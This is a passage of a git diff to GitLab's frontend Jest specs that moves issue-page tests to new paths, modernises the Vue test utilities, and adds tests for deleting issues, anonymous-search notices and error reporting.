'~/issue_show/constants'; +import IssueTypeField, { i18n } from '~/issues/show/components/fields/type.vue'; +import { IssuableTypes } from '~/issues/show/constants'; import { getIssueStateQueryResponse, updateIssueStateQueryResponse, diff --git a/spec/frontend/issue_show/components/form_spec.js b/spec/frontend/issues/show/components/form_spec.js index 28498cb90ec..db49d2635ba 100644 --- a/spec/frontend/issue_show/components/form_spec.js +++ b/spec/frontend/issues/show/components/form_spec.js @@ -1,11 +1,11 @@ import { GlAlert } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import Autosave from '~/autosave'; -import DescriptionTemplate from '~/issue_show/components/fields/description_template.vue'; -import IssueTypeField from '~/issue_show/components/fields/type.vue'; -import formComponent from '~/issue_show/components/form.vue'; -import LockedWarning from '~/issue_show/components/locked_warning.vue'; -import eventHub from '~/issue_show/event_hub'; +import DescriptionTemplate from '~/issues/show/components/fields/description_template.vue'; +import IssueTypeField from '~/issues/show/components/fields/type.vue'; +import formComponent from '~/issues/show/components/form.vue'; +import LockedWarning from '~/issues/show/components/locked_warning.vue'; +import eventHub from '~/issues/show/event_hub'; jest.mock('~/autosave'); @@ -13,6 +13,7 @@ describe('Inline edit form component', () => { let wrapper; const defaultProps = { canDestroy: true, + endpoint: 'gitlab-org/gitlab-test/-/issues/1', formState: { title: 'b', description: 'a', diff --git a/spec/frontend/issue_show/components/header_actions_spec.js b/spec/frontend/issues/show/components/header_actions_spec.js index 4df62ec8717..2a16c699c4d 100644 --- a/spec/frontend/issue_show/components/header_actions_spec.js +++ b/spec/frontend/issues/show/components/header_actions_spec.js @@ -1,11 +1,15 @@ import { GlButton, GlDropdown, GlDropdownItem, GlLink, GlModal } from '@gitlab/ui'; -import { createLocalVue, shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; +import { shallowMount } from '@vue/test-utils'; import Vuex from 'vuex'; +import { mockTracking } from 'helpers/tracking_helper'; import createFlash, { FLASH_TYPES } from '~/flash'; -import { IssuableType } from '~/issuable_show/constants'; -import HeaderActions from '~/issue_show/components/header_actions.vue'; -import { IssuableStatus, IssueStateEvent } from '~/issue_show/constants'; -import promoteToEpicMutation from '~/issue_show/queries/promote_to_epic.mutation.graphql'; +import { IssuableType } from '~/vue_shared/issuable/show/constants'; +import DeleteIssueModal from '~/issues/show/components/delete_issue_modal.vue'; +import HeaderActions from '~/issues/show/components/header_actions.vue'; +import { IssuableStatus } from '~/issues/constants'; +import { IssueStateEvent } from '~/issues/show/constants'; +import promoteToEpicMutation from '~/issues/show/queries/promote_to_epic.mutation.graphql'; import * as urlUtility from '~/lib/utils/url_utility'; import eventHub from '~/notes/event_hub'; import createStore from '~/notes/stores'; @@ -18,18 +22,20 @@ describe('HeaderActions component', () => { let wrapper; let visitUrlSpy; - const localVue = createLocalVue(); - localVue.use(Vuex); + Vue.use(Vuex); + const store = createStore(); const defaultProps = { canCreateIssue: true, + canDestroyIssue: true, canPromoteToEpic: true, canReopenIssue: true, canReportSpam: true, canUpdateIssue: true, iid: '32', isIssueAuthor: true, + issuePath: 'gitlab-org/gitlab-test/-/issues/1', issueType: IssuableType.Issue, newIssuePath: 'gitlab-org/gitlab-test/-/issues/new', projectPath: 'gitlab-org/gitlab-test', @@ -60,17 +66,12 @@ describe('HeaderActions component', () => { }, }; - const findToggleIssueStateButton = () => wrapper.find(GlButton); - - const findDropdownAt = (index) => wrapper.findAll(GlDropdown).at(index); - - const findMobileDropdownItems = () => findDropdownAt(0).findAll(GlDropdownItem); - - const findDesktopDropdownItems = () => findDropdownAt(1).findAll(GlDropdownItem); - - const findModal = () => wrapper.find(GlModal); - - const findModalLinkAt = (index) => findModal().findAll(GlLink).at(index); + const findToggleIssueStateButton = () => wrapper.findComponent(GlButton); + const findDropdownAt = (index) => wrapper.findAllComponents(GlDropdown).at(index); + const findMobileDropdownItems = () => findDropdownAt(0).findAllComponents(GlDropdownItem); + const findDesktopDropdownItems = () => findDropdownAt(1).findAllComponents(GlDropdownItem); + const findModal = () => wrapper.findComponent(GlModal); + const findModalLinkAt = (index) => findModal().findAllComponents(GlLink).at(index); const mountComponent = ({ props = {}, @@ -86,7 +87,6 @@ describe('HeaderActions component', () => { }); return shallowMount(HeaderActions, { - localVue, store, provide: { ...defaultProps, @@ -167,17 +167,19 @@ describe('HeaderActions component', () => { ${'desktop dropdown'} | ${false} | ${findDesktopDropdownItems} `('$description', ({ isCloseIssueItemVisible, findDropdownItems }) => { describe.each` - description | itemText | isItemVisible | canUpdateIssue | canCreateIssue | isIssueAuthor | canReportSpam | canPromoteToEpic - ${`when user can update ${issueType}`} | ${`Close ${issueType}`} | ${isCloseIssueItemVisible} | ${true} | ${true} | ${true} | ${true} | ${true} - ${`when user cannot update ${issueType}`} | ${`Close ${issueType}`} | ${false} | ${false} | ${true} | ${true} | ${true} | ${true} - ${`when user can create ${issueType}`} | ${`New ${issueType}`} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} - ${`when user cannot create ${issueType}`} | ${`New ${issueType}`} | ${false} | ${true} | ${false} | ${true} | ${true} | ${true} - ${'when user can promote to epic'} | ${'Promote to epic'} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} - ${'when user cannot promote to epic'} | ${'Promote to epic'} | ${false} | ${true} | ${true} | ${true} | ${true} | ${false} - ${'when user can report abuse'} | ${'Report abuse'} | ${true} | ${true} | ${true} | ${false} | ${true} | ${true} - ${'when user cannot report abuse'} | ${'Report abuse'} | ${false} | ${true} | ${true} | ${true} | ${true} | ${true} - ${'when user can submit as spam'} | ${'Submit as spam'} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} - ${'when user cannot submit as spam'} | ${'Submit as spam'} | ${false} | ${true} | ${true} | ${true} | ${false} | ${true} + description | itemText | isItemVisible | canUpdateIssue | canCreateIssue | isIssueAuthor | canReportSpam | canPromoteToEpic | canDestroyIssue + ${`when user can update ${issueType}`} | ${`Close ${issueType}`} | ${isCloseIssueItemVisible} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} + ${`when user cannot update ${issueType}`} | ${`Close ${issueType}`} | ${false} | ${false} | ${true} | ${true} | ${true} | ${true} | ${true} + ${`when user can create ${issueType}`} | ${`New ${issueType}`} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} + ${`when user cannot create ${issueType}`} | ${`New ${issueType}`} | ${false} | ${true} | ${false} | ${true} | ${true} | ${true} | ${true} + ${'when user can promote to epic'} | ${'Promote to epic'} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} + ${'when user cannot promote to epic'} | ${'Promote to epic'} | ${false} | ${true} | ${true} | ${true} | ${true} | ${false} | ${true} + ${'when user can report abuse'} | ${'Report abuse'} | ${true} | ${true} | ${true} | ${false} | ${true} | ${true} | ${true} + ${'when user cannot report abuse'} | ${'Report abuse'} | ${false} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} + ${'when user can submit as spam'} | ${'Submit as spam'} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} + ${'when user cannot submit as spam'} | ${'Submit as spam'} | ${false} | ${true} | ${true} | ${true} | ${false} | ${true} | ${true} + ${`when user can delete ${issueType}`} | ${`Delete ${issueType}`} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} + ${`when user cannot delete ${issueType}`} | ${`Delete ${issueType}`} | ${false} | ${true} | ${true} | ${true} | ${true} | ${true} | ${false} `( '$description', ({ @@ -188,6 +190,7 @@ describe('HeaderActions component', () => { isIssueAuthor, canReportSpam, canPromoteToEpic, + canDestroyIssue, }) => { beforeEach(() => { wrapper = mountComponent({ @@ -198,6 +201,7 @@ describe('HeaderActions component', () => { issueType, canReportSpam, canPromoteToEpic, + canDestroyIssue, }, }); }); @@ -214,6 +218,23 @@ describe('HeaderActions component', () => { }); }); + describe('delete issue button', () => { + let trackingSpy; + + beforeEach(() => { + wrapper = mountComponent(); + trackingSpy = mockTracking(undefined, wrapper.element, jest.spyOn); + }); + + it('tracks clicking on button', () => { + findDesktopDropdownItems().at(3).vm.$emit('click'); + + expect(trackingSpy).toHaveBeenCalledWith(undefined, 'click_dropdown', { + label: 'delete_issue', + }); + }); + }); + describe('when "Promote to epic" button is clicked', () => { describe('when response is successful', () => { beforeEach(() => { @@ -267,7 +288,7 @@ describe('HeaderActions component', () => { it('shows an error message', () => { expect(createFlash).toHaveBeenCalledWith({ - message: promoteToEpicMutationErrorResponse.data.promoteToEpic.errors.join('; '), + message: HeaderActions.i18n.promoteErrorMessage, }); }); }); @@ -293,7 +314,7 @@ describe('HeaderActions component', () => { }); }); - describe('modal', () => { + describe('blocked by issues modal', () => { const blockedByIssues = [ { iid: 13, web_url: 'gitlab-org/gitlab-test/-/issues/13' }, { iid: 79, web_url: 'gitlab-org/gitlab-test/-/issues/79' }, @@ -345,4 +366,17 @@ describe('HeaderActions component', () => { }); }); }); + + describe('delete issue modal', () => { + it('renders', () => { + wrapper = mountComponent(); + + expect(wrapper.findComponent(DeleteIssueModal).props()).toEqual({ + issuePath: defaultProps.issuePath, + issueType: defaultProps.issueType, + modalId: HeaderActions.deleteModalId, + title: 'Delete issue', + }); + }); + }); }); diff --git a/spec/frontend/issue_show/components/incidents/highlight_bar_spec.js b/spec/frontend/issues/show/components/incidents/highlight_bar_spec.js index 6758e6192b8..a4910d63bb5 100644 --- a/spec/frontend/issue_show/components/incidents/highlight_bar_spec.js +++ b/spec/frontend/issues/show/components/incidents/highlight_bar_spec.js @@ -1,7 +1,7 @@ import { GlLink } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import merge from 'lodash/merge'; -import HighlightBar from '~/issue_show/components/incidents/highlight_bar.vue'; +import HighlightBar from '~/issues/show/components/incidents/highlight_bar.vue'; import { formatDate } from '~/lib/utils/datetime_utility'; jest.mock('~/lib/utils/datetime_utility'); diff --git a/spec/frontend/issue_show/components/incidents/incident_tabs_spec.js b/spec/frontend/issues/show/components/incidents/incident_tabs_spec.js index 6b9f5b17e99..9bf0e106194 100644 --- a/spec/frontend/issue_show/components/incidents/incident_tabs_spec.js +++ b/spec/frontend/issues/show/components/incidents/incident_tabs_spec.js @@ -3,9 +3,9 @@ import { shallowMount } from '@vue/test-utils'; import merge from 'lodash/merge'; import waitForPromises from 'helpers/wait_for_promises'; import { trackIncidentDetailsViewsOptions } from '~/incidents/constants'; -import DescriptionComponent from '~/issue_show/components/description.vue'; -import HighlightBar from '~/issue_show/components/incidents/highlight_bar.vue'; -import IncidentTabs from '~/issue_show/components/incidents/incident_tabs.vue'; +import DescriptionComponent from '~/issues/show/components/description.vue'; +import HighlightBar from '~/issues/show/components/incidents/highlight_bar.vue'; +import IncidentTabs from '~/issues/show/components/incidents/incident_tabs.vue'; import INVALID_URL from '~/lib/utils/invalid_url'; import Tracking from '~/tracking'; import AlertDetailsTable from '~/vue_shared/components/alert_details_table.vue'; diff --git a/spec/frontend/issue_show/components/pinned_links_spec.js b/spec/frontend/issues/show/components/pinned_links_spec.js index 3fe1f9fd6d9..aac720df6e9 100644 --- a/spec/frontend/issue_show/components/pinned_links_spec.js +++ b/spec/frontend/issues/show/components/pinned_links_spec.js @@ -1,7 +1,7 @@ import { GlButton } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; -import PinnedLinks from '~/issue_show/components/pinned_links.vue'; -import { STATUS_PAGE_PUBLISHED, JOIN_ZOOM_MEETING } from '~/issue_show/constants'; +import PinnedLinks from '~/issues/show/components/pinned_links.vue'; +import { STATUS_PAGE_PUBLISHED, JOIN_ZOOM_MEETING } from '~/issues/show/constants'; const plainZoomUrl = 'https://zoom.us/j/123456789'; const plainStatusUrl = 'https://status.com'; diff --git a/spec/frontend/issue_show/components/title_spec.js b/spec/frontend/issues/show/components/title_spec.js index 78880a7f540..f9026557be2 100644 --- a/spec/frontend/issue_show/components/title_spec.js +++ b/spec/frontend/issues/show/components/title_spec.js @@ -1,7 +1,7 @@ import Vue from 'vue'; -import titleComponent from '~/issue_show/components/title.vue'; -import eventHub from '~/issue_show/event_hub'; -import Store from '~/issue_show/stores'; +import titleComponent from '~/issues/show/components/title.vue'; +import eventHub from '~/issues/show/event_hub'; +import Store from '~/issues/show/stores'; describe('Title component', () => { let vm; diff --git a/spec/frontend/issue_show/issue_spec.js b/spec/frontend/issues/show/issue_spec.js index 76989413edb..6d7a31a6c8c 100644 --- a/spec/frontend/issue_show/issue_spec.js +++ b/spec/frontend/issues/show/issue_spec.js @@ -1,7 +1,7 @@ import MockAdapter from 'axios-mock-adapter'; import waitForPromises from 'helpers/wait_for_promises'; -import { initIssuableApp } from '~/issue_show/issue'; -import * as parseData from '~/issue_show/utils/parse_data'; +import { initIssuableApp } from '~/issues/show/issue'; +import * as parseData from '~/issues/show/utils/parse_data'; import axios from '~/lib/utils/axios_utils'; import createStore from '~/notes/stores'; import { appProps } from './mock_data/mock_data'; @@ -17,7 +17,7 @@ const setupHTML = (initialData) => { }; describe('Issue show index', () => { - describe('initIssueableApp', () => { + describe('initIssuableApp', () => { it('should initialize app with no potential XSS attack', async () => { const alertSpy = jest.spyOn(window, 'alert').mockImplementation(() => {}); const parseDataSpy = jest.spyOn(parseData, 'parseIssuableData'); diff --git a/spec/frontend/issue_show/mock_data/apollo_mock.js b/spec/frontend/issues/show/mock_data/apollo_mock.js index bfd31e74393..bfd31e74393 100644 --- a/spec/frontend/issue_show/mock_data/apollo_mock.js +++ b/spec/frontend/issues/show/mock_data/apollo_mock.js diff --git a/spec/frontend/issue_show/mock_data/mock_data.js b/spec/frontend/issues/show/mock_data/mock_data.js index a73826954c3..a73826954c3 100644 --- a/spec/frontend/issue_show/mock_data/mock_data.js +++ b/spec/frontend/issues/show/mock_data/mock_data.js diff --git a/spec/frontend/issue_show/store_spec.js b/spec/frontend/issues/show/store_spec.js index b7fd70bf00e..20d3a6cdaae 100644 --- a/spec/frontend/issue_show/store_spec.js +++ b/spec/frontend/issues/show/store_spec.js @@ -1,7 +1,7 @@ -import Store from '~/issue_show/stores'; -import updateDescription from '~/issue_show/utils/update_description'; +import Store from '~/issues/show/stores'; +import updateDescription from '~/issues/show/utils/update_description'; -jest.mock('~/issue_show/utils/update_description'); +jest.mock('~/issues/show/utils/update_description'); describe('Store', () => { let store; diff --git a/spec/frontend/issue_show/utils/update_description_spec.js b/spec/frontend/issues/show/utils/update_description_spec.js index b2c6bd3c302..f4afef8af12 100644 --- a/spec/frontend/issue_show/utils/update_description_spec.js +++ b/spec/frontend/issues/show/utils/update_description_spec.js @@ -1,4 +1,4 @@ -import updateDescription from '~/issue_show/utils/update_description'; +import updateDescription from '~/issues/show/utils/update_description'; describe('updateDescription', () => { it('returns the correct value to be set as descriptionHtml', () => { diff --git a/spec/frontend/issues_list/components/issuable_spec.js b/spec/frontend/issues_list/components/issuable_spec.js index 97d841c861d..f3c2ae1f9dc 100644 --- a/spec/frontend/issues_list/components/issuable_spec.js +++ b/spec/frontend/issues_list/components/issuable_spec.js @@ -7,7 +7,7 @@ import { isScopedLabel } from '~/lib/utils/common_utils'; import { formatDate } from '~/lib/utils/datetime_utility'; import { mergeUrlParams } from '~/lib/utils/url_utility'; import initUserPopovers from '~/user_popovers'; -import IssueAssignees from '~/vue_shared/components/issue/issue_assignees.vue'; +import IssueAssignees from '~/issuable/components/issue_assignees.vue'; import { simpleIssue, testAssignees, testLabels } from '../issuable_list_test_data'; jest.mock('~/user_popovers'); diff --git a/spec/frontend/issues_list/components/issuables_list_app_spec.js b/spec/frontend/issues_list/components/issuables_list_app_spec.js index 5ef2a2e0525..11854db534e 100644 --- a/spec/frontend/issues_list/components/issuables_list_app_spec.js +++ b/spec/frontend/issues_list/components/issuables_list_app_spec.js @@ -13,7 +13,7 @@ import createFlash from '~/flash'; import Issuable from '~/issues_list/components/issuable.vue'; import IssuablesListApp from '~/issues_list/components/issuables_list_app.vue'; import { PAGE_SIZE, PAGE_SIZE_MANUAL, RELATIVE_POSITION } from '~/issues_list/constants'; -import issueablesEventBus from '~/issues_list/eventhub'; +import issuablesEventBus from '~/issues_list/eventhub'; import FilteredSearchBar from '~/vue_shared/components/filtered_search_bar/filtered_search_bar_root.vue'; jest.mock('~/flash'); @@ -185,8 +185,8 @@ describe('Issuables list component', () => { describe('with bulk editing enabled', () => { beforeEach(() => { - issueablesEventBus.$on.mockReset(); - issueablesEventBus.$emit.mockReset(); + issuablesEventBus.$on.mockReset(); + issuablesEventBus.$emit.mockReset(); setupApiMock(() => [200, MOCK_ISSUES.slice(0)]); factory({ canBulkEdit: true }); @@ -239,19 +239,19 @@ describe('Issuables list component', () => { }); it('broadcasts a message to the bulk edit sidebar when a value is added to selection', () => { - issueablesEventBus.$emit.mockReset(); + issuablesEventBus.$emit.mockReset(); const i1 = wrapper.vm.issuables[1]; wrapper.vm.onSelectIssuable({ issuable: i1, selected: true }); return wrapper.vm.$nextTick().then(() => { - expect(issueablesEventBus.$emit).toHaveBeenCalledTimes(1); - expect(issueablesEventBus.$emit).toHaveBeenCalledWith('issuables:updateBulkEdit'); + expect(issuablesEventBus.$emit).toHaveBeenCalledTimes(1); + expect(issuablesEventBus.$emit).toHaveBeenCalledWith('issuables:updateBulkEdit'); }); }); it('does not broadcast a message to the bulk edit sidebar when a value is not added to selection', () => { - issueablesEventBus.$emit.mockReset(); + issuablesEventBus.$emit.mockReset(); return wrapper.vm .$nextTick() @@ -263,19 +263,19 @@ describe('Issuables list component', () => { }) .then(wrapper.vm.$nextTick) .then(() => { - expect(issueablesEventBus.$emit).toHaveBeenCalledTimes(0); + expect(issuablesEventBus.$emit).toHaveBeenCalledTimes(0); }); }); it('listens to a message to toggle bulk editing', () => { expect(wrapper.vm.isBulkEditing).toBe(false); - expect(issueablesEventBus.$on.mock.calls[0][0]).toBe('issuables:toggleBulkEdit'); - issueablesEventBus.$on.mock.calls[0][1](true); // Call the message handler + expect(issuablesEventBus.$on.mock.calls[0][0]).toBe('issuables:toggleBulkEdit'); + issuablesEventBus.$on.mock.calls[0][1](true); // Call the message handler return waitForPromises() .then(() => { expect(wrapper.vm.isBulkEditing).toBe(true); - issueablesEventBus.$on.mock.calls[0][1](false); + issuablesEventBus.$on.mock.calls[0][1](false); }) .then(() => { expect(wrapper.vm.isBulkEditing).toBe(false); diff --git a/spec/frontend/issues_list/components/issue_card_time_info_spec.js b/spec/frontend/issues_list/components/issue_card_time_info_spec.js index d195c159cbb..7c5faeb8dc1 100644 --- a/spec/frontend/issues_list/components/issue_card_time_info_spec.js +++ b/spec/frontend/issues_list/components/issue_card_time_info_spec.js @@ -3,7 +3,7 @@ import { shallowMount } from '@vue/test-utils'; import { useFakeDate } from 'helpers/fake_date'; import IssueCardTimeInfo from '~/issues_list/components/issue_card_time_info.vue'; -describe('IssuesListApp component', () => { +describe('CE IssueCardTimeInfo component', () => { useFakeDate(2020, 11, 11); let wrapper; diff --git a/spec/frontend/issues_list/components/issues_list_app_spec.js b/spec/frontend/issues_list/components/issues_list_app_spec.js index 3f52c7b4afe..f24c090fa92 100644 --- a/spec/frontend/issues_list/components/issues_list_app_spec.js +++ b/spec/frontend/issues_list/components/issues_list_app_spec.js @@ -1,8 +1,9 @@ import { GlButton, GlEmptyState, GlLink } from '@gitlab/ui'; -import { createLocalVue, mount, shallowMount } from '@vue/test-utils'; +import * as Sentry from '@sentry/browser'; +import { mount, shallowMount } from '@vue/test-utils'; import AxiosMockAdapter from 'axios-mock-adapter'; import { cloneDeep } from 'lodash'; -import { nextTick } from 'vue'; +import Vue, { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; import getIssuesQuery from 'ee_else_ce/issues_list/queries/get_issues.query.graphql'; import getIssuesCountsQuery from 'ee_else_ce/issues_list/queries/get_issues_counts.query.graphql'; @@ -17,29 +18,28 @@ import { locationSearch, urlParams, } from 'jest/issues_list/mock_data'; -import createFlash from '~/flash'; +import createFlash, { FLASH_TYPES } from '~/flash'; import { convertToGraphQLId, getIdFromGraphQLId } from '~/graphql_shared/utils'; import CsvImportExportButtons from '~/issuable/components/csv_import_export_buttons.vue'; import IssuableByEmail from '~/issuable/components/issuable_by_email.vue'; -import IssuableList from '~/issuable_list/components/issuable_list_root.vue'; -import { IssuableListTabs, IssuableStates } from '~/issuable_list/constants'; +import IssuableList from '~/vue_shared/issuable/list/components/issuable_list_root.vue'; +import { IssuableListTabs, IssuableStates } from '~/vue_shared/issuable/list/constants'; import IssuesListApp from '~/issues_list/components/issues_list_app.vue'; import NewIssueDropdown from '~/issues_list/components/new_issue_dropdown.vue'; import { CREATED_DESC, DUE_DATE_OVERDUE, PARAM_DUE_DATE, + RELATIVE_POSITION, + RELATIVE_POSITION_ASC, TOKEN_TYPE_ASSIGNEE, TOKEN_TYPE_AUTHOR, TOKEN_TYPE_CONFIDENTIAL, - TOKEN_TYPE_EPIC, - TOKEN_TYPE_ITERATION, TOKEN_TYPE_LABEL, TOKEN_TYPE_MILESTONE, TOKEN_TYPE_MY_REACTION, TOKEN_TYPE_RELEASE, TOKEN_TYPE_TYPE, - TOKEN_TYPE_WEIGHT, urlSortParams, } from '~/issues_list/constants'; import eventHub from '~/issues_list/eventhub'; @@ -48,17 +48,17 @@ import axios from '~/lib/utils/axios_utils'; import { scrollUp } from '~/lib/utils/scroll_utils'; import { joinPaths } from '~/lib/utils/url_utility'; +jest.mock('@sentry/browser'); jest.mock('~/flash'); jest.mock('~/lib/utils/scroll_utils', () => ({ scrollUp: jest.fn().mockName('scrollUpMock'), })); -describe('IssuesListApp component', () => { +describe('CE IssuesListApp component', () => { let axiosMock; let wrapper; - const localVue = createLocalVue(); - localVue.use(VueApollo); + Vue.use(VueApollo); const defaultProvide = { calendarPath: 'calendar/path', @@ -69,6 +69,7 @@ describe('IssuesListApp component', () => { hasAnyIssues: true, hasAnyProjects: true, hasBlockedIssuesFeature: true, + hasIssuableHealthStatusFeature: true, hasIssueWeightsFeature: true, hasIterationsFeature: true, isProject: true, @@ -111,7 +112,6 @@ describe('IssuesListApp component', () => { const apolloProvider = createMockApollo(requestHandlers); return mountFn(IssuesListApp, { - localVue, apolloProvider, provide: { ...defaultProvide, @@ -314,6 +314,29 @@ describe('IssuesListApp component', () => { }, }); }); + + describe('when issue repositioning is disabled and the sort is manual', () => { + beforeEach(() => { + setWindowLocation(`?sort=${RELATIVE_POSITION}`); + wrapper = mountComponent({ provide: { isIssueRepositioningDisabled: true } }); + }); + + it('changes the sort to the default of created descending', () => { + expect(findIssuableList().props()).toMatchObject({ + initialSortBy: CREATED_DESC, + urlParams: { + sort: urlSortParams[CREATED_DESC], + }, + }); + }); + + it('shows an alert to tell the user that manual reordering is disabled', () => { + expect(createFlash).toHaveBeenCalledWith({ + message: IssuesListApp.i18n.issueRepositioningMessage, + type: FLASH_TYPES.NOTICE, + }); + }); + }); }); describe('state', () => { @@ -336,6 +359,27 @@ describe('IssuesListApp component', () => { expect(findIssuableList().props('initialFilterValue')).toEqual(filteredTokens); }); + + describe('when anonymous searching is performed', () => { + beforeEach(() => { + setWindowLocation(locationSearch); + + wrapper = mountComponent({ + provide: { isAnonymousSearchDisabled: true, isSignedIn: false }, + }); + }); + + it('is not set from url params', () => { + expect(findIssuableList().props('initialFilterValue')).toEqual([]); + }); + + it('shows an alert to tell the user they must be signed in to search', () => { + expect(createFlash).toHaveBeenCalledWith({ + message: IssuesListApp.i18n.anonymousSearchingMessage, + type: FLASH_TYPES.NOTICE, + }); + }); + }); }); }); @@ -484,11 +528,7 @@ describe('IssuesListApp component', () => { describe('when user is signed out', () => { beforeEach(() => { - wrapper = mountComponent({ - provide: { - isSignedIn: false, - }, - }); + wrapper = mountComponent({ provide: { isSignedIn: false } }); }); it('does not render My-Reaction or Confidential tokens', () => { @@ -501,54 +541,6 @@ describe('IssuesListApp component', () => { }); }); - describe('when iterations are not available', () => { - beforeEach(() => { - wrapper = mountComponent({ - provide: { - projectIterationsPath: '', - }, - }); - }); - - it('does not render Iteration token', () => { - expect(findIssuableList().props('searchTokens')).not.toMatchObject([ - { type: TOKEN_TYPE_ITERATION }, - ]); - }); - }); - - describe('when epics are not available', () => { - beforeEach(() => { - wrapper = mountComponent({ - provide: { - groupPath: '', - }, - }); - }); - - it('does not render Epic token', () => { - expect(findIssuableList().props('searchTokens')).not.toMatchObject([ - { type: TOKEN_TYPE_EPIC }, - ]); - }); - }); - - describe('when weights are not available', () => { - beforeEach(() => { - wrapper = mountComponent({ - provide: { - groupPath: '', - }, - }); - }); - - it('does not render Weight token', () => { - expect(findIssuableList().props('searchTokens')).not.toMatchObject([ - { type: TOKEN_TYPE_WEIGHT }, - ]); - }); - }); - describe('when all tokens are available', () => { const originalGon = window.gon; @@ -561,33 +553,27 @@ describe('IssuesListApp component', () => { current_user_avatar_url: mockCurrentUser.avatar_url, }; - wrapper = mountComponent({ - provide: { - isSignedIn: true, - projectIterationsPath: 'project/iterations/path', - groupPath: 'group/path', - hasIssueWeightsFeature: true, - }, - }); + wrapper = mountComponent({ provide: { isSignedIn: true } }); }); - it('renders all tokens', () => { + afterEach(() => { + window.gon = originalGon; + }); + + it('renders all tokens alphabetically', () => { const preloadedAuthors = [ { ...mockCurrentUser, id: convertToGraphQLId('User', mockCurrentUser.id) }, ]; expect(findIssuableList().props('searchTokens')).toMatchObject([ - { type: TOKEN_TYPE_AUTHOR, preloadedAuthors }, { type: TOKEN_TYPE_ASSIGNEE, preloadedAuthors }, - { type: TOKEN_TYPE_MILESTONE }, + { type: TOKEN_TYPE_AUTHOR, preloadedAuthors }, + { type: TOKEN_TYPE_CONFIDENTIAL }, { type: TOKEN_TYPE_LABEL }, - { type: TOKEN_TYPE_TYPE }, - { type: TOKEN_TYPE_RELEASE }, + { type: TOKEN_TYPE_MILESTONE }, { type: TOKEN_TYPE_MY_REACTION }, - { type: TOKEN_TYPE_CONFIDENTIAL }, - { type: TOKEN_TYPE_ITERATION }, - { type: TOKEN_TYPE_EPIC }, - { type: TOKEN_TYPE_WEIGHT }, + { type: TOKEN_TYPE_RELEASE }, + { type: TOKEN_TYPE_TYPE }, ]); }); }); @@ -607,13 +593,18 @@ describe('IssuesListApp component', () => { }); it('shows an error message', () => { - expect(createFlash).toHaveBeenCalledWith({ - captureError: true, - error: new Error('Network error: ERROR'), - message, - }); + expect(findIssuableList().props('error')).toBe(message); + expect(Sentry.captureException).toHaveBeenCalledWith(new Error('Network error: ERROR')); }); }); + + it('clears error message when "dismiss-alert" event is emitted from IssuableList', () => { + wrapper = mountComponent({ issuesQueryResponse: jest.fn().mockRejectedValue(new Error()) }); + + findIssuableList().vm.$emit('dismiss-alert'); + + expect(findIssuableList().props('error')).toBeNull(); + }); }); describe('events', () => { @@ -676,6 +667,7 @@ describe('IssuesListApp component', () => { const response = (isProject = true) => ({ data: { [isProject ? 'project' : 'group']: { + id: '1', issues: { ...defaultQueryResponse.data.project.issues, nodes: [issueOne, issueTwo, issueThree, issueFour], @@ -737,11 +729,10 @@ describe('IssuesListApp component', () => { await waitForPromises(); - expect(createFlash).toHaveBeenCalledWith({ - message: IssuesListApp.i18n.reorderError, - captureError: true, - error: new Error('Request failed with status code 500'), - }); + expect(findIssuableList().props('error')).toBe(IssuesListApp.i18n.reorderError); + expect(Sentry.captureException).toHaveBeenCalledWith( + new Error('Request failed with status code 500'), + ); }); }); }); @@ -762,6 +753,30 @@ describe('IssuesListApp component', () => { }); }, ); + + describe('when issue repositioning is disabled', () => { + const initialSort = CREATED_DESC; + + beforeEach(() => { + setWindowLocation(`?sort=${initialSort}`); + wrapper = mountComponent({ provide: { isIssueRepositioningDisabled: true } }); + + findIssuableList().vm.$emit('sort', RELATIVE_POSITION_ASC); + }); + + it('does not update the sort to manual', () => { + expect(findIssuableList().props('urlParams')).toMatchObject({ + sort: urlSortParams[initialSort], + }); + }); + + it('shows an alert to tell the user that manual reordering is disabled', () => { + expect(createFlash).toHaveBeenCalledWith({ + message: IssuesListApp.i18n.issueRepositioningMessage, + type: FLASH_TYPES.NOTICE, + }); + }); + }); }); describe('when "update-legacy-bulk-edit" event is emitted by IssuableList', () => { @@ -778,15 +793,37 @@ describe('IssuesListApp component', () => { }); describe('when "filter" event is emitted by IssuableList', () => { - beforeEach(() => { + it('updates IssuableList with url params', async () => { wrapper = mountComponent(); findIssuableList().vm.$emit('filter', filteredTokens); - }); + await nextTick(); - it('updates IssuableList with url params', () => { expect(findIssuableList().props('urlParams')).toMatchObject(urlParams); }); + + describe('when anonymous searching is performed', () => { + beforeEach(() => { + wrapper = mountComponent({ + provide: { isAnonymousSearchDisabled: true, isSignedIn: false }, + }); + + findIssuableList().vm.$emit('filter', filteredTokens); + }); + + it('does not update IssuableList with url params ', async () => { + const defaultParams = { sort: 'created_date', state: 'opened' }; + + expect(findIssuableList().props('urlParams')).toEqual(defaultParams); + }); + + it('shows an alert to tell the user they must be signed in to search', () => { + expect(createFlash).toHaveBeenCalledWith({ + message: IssuesListApp.i18n.anonymousSearchingMessage, + type: FLASH_TYPES.NOTICE, + }); + }); + }); }); }); }); diff --git a/spec/frontend/issues_list/mock_data.js b/spec/frontend/issues_list/mock_data.js index 19a8af4d9c2..948699876ce 100644 --- a/spec/frontend/issues_list/mock_data.js +++ b/spec/frontend/issues_list/mock_data.js @@ -6,6 +6,7 @@ import { export const getIssuesQueryResponse = { data: { project: { + id: '1', issues: { pageInfo: { hasNextPage: true, @@ -22,6 +23,7 @@ export const getIssuesQueryResponse = { createdAt: '2021-05-22T04:08:01Z', downvotes: 2, dueDate: '2021-05-29', + hidden: false, humanTimeEstimate: null, mergeRequestsCount: false, moved: false, @@ -74,6 +76,7 @@ export const getIssuesQueryResponse = { export const getIssuesCountsQueryResponse = { data: { project: { + id: '1', openedIssues: { count: 1, }, @@ -287,6 +290,7 @@ export const project3 = { export const 